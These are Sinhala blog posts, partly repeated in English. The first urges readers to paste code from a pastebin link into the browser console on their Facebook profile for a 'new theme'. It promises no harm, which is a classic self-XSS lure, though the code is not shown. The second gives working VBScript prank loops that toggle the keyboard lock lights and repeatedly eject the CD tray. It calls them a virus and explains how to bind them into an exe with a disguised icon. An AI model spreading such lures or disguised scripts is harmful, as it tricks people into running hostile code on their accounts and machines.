හැමදාම Facebook එක එකම විදිහට දැකලා එපා 


වෙලා ඇතිනේ නේද.?



හැමදාම Facebook එක එකම විදිහට දැකලා එපා වෙලා ඇතිනේ නේද. ඉතින් එකට පොඩි වෙනසක් කරන්නයි මම අද ඔයාලට කියලා දෙන්න යන්නේ. බය වෙන්න එපා මේකෙන් ඔයාලගේ Account එකට කිසිදු හානියක් සිද්ද වෙන්නේ නැහැ මම වගකීමකින් යුතුව ඒක කියනවා. එහෙම දෙයක්නම් ඔයාලට දෙන්නෙත් නෑ අනික මේක SPAM එකකුත් නෙවේ.

යාලුවන්ටත් දැනගන්න share කරන්න අමතක කරන්න එපා !

හරි එහෙනම් අපි වැඩේට බහිමු.

පළමු පියවර - http://pastebin.com/raw.php?i=kQdKpN2i මේ තියෙන Link එක Copy කරගෙන ගිහින් ඔයාලගේ Browser එකේ අලුත් tab එකක් open කරලා එකේ URL එක තියෙන තැන Paste කරන්න කරලා Enter Button එක ඔබන්න . දැන් එකේ තියෙනවා දිග Code එකක් එක Copy කරගන්න මුලින්ම CTRl+A ඔබන්න එතකොට Code එක ඔක්කොම Select වෙනවා දැන් එක Copy කරගන්න Ctrl+C ඔබන්න එතකොට copy වෙනවා.

දෙවන පියවර - Copy කරගත්ත code එක අරගෙන නැවත ඔයාගේ Facebook Profile එකට එන්න ඇවිත් ඔය පාවිච්චි කරන්නේ google Chrome නම් Ctrl+shift+J ඔබන්න ඔයයා පාවිච්චි කරන්නේ Firefox නම් Ctrl+shift+K ඔබන්න. ඊට පස්සේ දැන් අපි අර copy කරගත්ත Code එක Pasat කරනන් ඕනේ එකට Ctrl+V ඔබලා තත්පර 5ක් වගේ ඉන්න ඊට පස්සේ ENTER button එක ඔබන්න තවත් තත්පර 5ක් වගේ ඉන්න දැන් කොහොමද ? නියමයිනේ ?

යාලුවන්ටත් දැනගන්න share කරන්න අමතක කරන්න එපා !

***FaceBook Official Theme Changer***

I'm Gonna Show You How to Change your facebook theme Without Any Spam. I guarantee that For you

Step 1 - Copy This Link - http://pastebin.com/raw.php?i=kQdKpN2i

Step 2 - Open a New tab and Paste it in tothat tab and press enter.

Step 3 - Copy the Full Code To do that Press Ctrl+A after That Crtl+C. Make Sure You Copied The Full Code Correctly

Step 4 - Go back To Your Profile. IF you are using Google Chrome Press " Ctrl+Shift+ J " IF you are using Firefox Press " Ctrl+Shift+K"

Step 5 - Now you Need To Paste The Code, To Do that Press Ctrl+V. as the final Step press Enter and Wait 10 seconds ! All Done There You go........

Here Is your New Facebook Theme Enjoy it


0 comments:

හොදයි අද වැඩේ තම .ඇත්තටම කිව්වොත් අද කරන්න යන්නේ පරිගණකය පිස්සු වට්ටන එක ^_^ .knight rider කිව්වම ඉතින් දන්නේ නැති කෙනෙක් නැනේ .කස්ටිය එතින් 4017B IC එක දල knight rider curcuit එහෙමත් හදල ඇතිනේ .keyboard එක knight rider කරන්නේ කොහොමද .මේකට light අලුතින් දාලද .වෙන වැඩ නැනේ ඉතින් අපිට .මේ වැඩෙන් වෙන්නේ ඔයාලගේ keyboard එකේ තින numlock ,capslock , SCROLLLOCK කියන light තුන නිවී නිවී පත්තු වෙන විදිහට හදන එක .ඕනනම් ඒ ගමන්ම .cd /dvd tray නොනවත්වාම ඉලියට ඇතුලට යන විදිහට හදන්න පුළුවන් .ඔයාලට පොඩ්ඩක් තේරුණා වගේ .ඇත්තටම මේක virus එකක් ^_^



මුලින්ම අපි keyboard එක පිස්සු වට්ටන විදිහ බලමුකෝ !
ඔය පල්ලෙහා තින code එක copy කරගෙන notepad එකට දාගන්නකෝ

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

දැන් ඕක save කරන කොට knight rider.vbs  කියල save කරන්න
හරි දැන් ඒ save වෙච්ච file එක click කරලා බලන්නකෝ මොකද වෙන්නේ කියල .කොහොමද keyboard එක පිස්සු වැටිලා වගේ නේ .හරි වැඩේ කරා කියමුකෝ දැන් කොහොමද මේක නවත්වන්නේ .එකට ලේසි ක්‍රමයක් තින්නේ .ctrl +shit +Ese ඔබල task manger එකට යන්න. එකේ  ඇති wscript කියල එකක් එක end process දෙන්න වැඩේ හරි .ඔයාලට ඕනනම් මම මේක background sound එකක් එක්ක වගේ හදල තිනවා එක ගන්න ඕනනම් link එකෙන්  යන්න
දැන් බලමුකෝ cd /dvd tray එක පිස්සු වට්ටන විදිහ .එකටත් ඉතින් මුලින්ම පල්ලෙහා code එක notepad එකට දාගන්නකෝ

SET OWMP = CREATEOBJECT("WMPLAYER.OCX.7")

SET COLCDROMS = OWMP.CDROMCOLLECTION

DO

IF COLCDROMS.COUNT >= 1 THEN

FOR I = 0 TO COLCDROMS.COUNT - 1

COLCDROMS.ITEM(I).EJECT

NEXT

FOR I = 0 TO COLCDROMS.COUNT - 1

COLCDROMS.ITEM(I).EJECT

NEXT

END IF

WSCRIPT.SLEEP 5000

LOOP

දැන් ඕක crazy tray.vbs කියල save කරන්න (මොන නමක් දුන්නත් කමක් නෑ .අන්තිමට .vbs කියන කැල්ල ඕන )

දැන් බලන්නකෝ කොහොමද කියල cd /dvd rom එක පිස්සු වැටිලා වගේ නේ .
එකත් එතින් කලින් විදිහ වගේම task manger එකෙන් ගිහින් wscript කියන එක end process දීල නවත්ත ගන්න .
ඔයාලට හිතෙනවා ඇති මේ දෙකම එකට වැඩ කරන විදිහට හැදුවොත් කොහොමද කියල .එකට අපිට binder software එකක් ඕන වෙනවා .මොනවද මේ binders කියන්නේ .binders වලින් අපිට පුළුවන් එක සැරේට file ගොඩක් run කරන්න .ඔයාල easy binder කියන පොඩි software එක පල්ලෙහායින් මුලින්ම බාගෙන ඉන්නකෝ
පස්සේ ඒක extract කරගෙන open කරන්න
ඔය යට තින + ලකුණ click කරලා අර knight rider .vbs කියන එකයි ඊට පස්සේ crazy tray.vbs කියන file එකයි add කරගන්න .


පස්සේ settings ගිහිල්ල මුලින්ම icon එකක් දෙන්න .


ඔයාල ගව icon නැත්තන් .පල්ලෙහායින් icon ලෝඩ් එකක්ම බාගන්නකො .පොඩ්ඩක් ඉතින් ගැලපෙන විදිහේ icon එකක් දෙන්න .
ඔතන ඔයාල කැමති icon එකක් නැත්තෙන් පල්ලෙහා දීල තින site එකෙන් ගිහන් ඕනෑතරම් බාගන්න 
ඊට පස්සේ set out put file කියන තැන කැමති නමක් දීල save කරන්න .
දැන් මුල් ටැබ් එකට ගිහින් bind files කියන එක දීල වැඩේ කරගන්න .එතකොට ඔයාල හදපු exe file එක 
පෙනේවි 

දැන් ඕක click කලාම වැඩ දෙකම එක සැරේට වෙනව .ඔයාලට ඕනනම් මම ඉස්සෙල්ල පොස්ට් එකක කියල දීපු විදිහට ඕක අස්සෙන් මොකක් හරි කියවන විදිහට හදන්න පුළුවන් .ඒ පොස්ට් එක කියවපු නැති අය පල්ලෙහා link එකෙන් ගිහින් එකත් කියවල බලන්නකෝ

0 comments: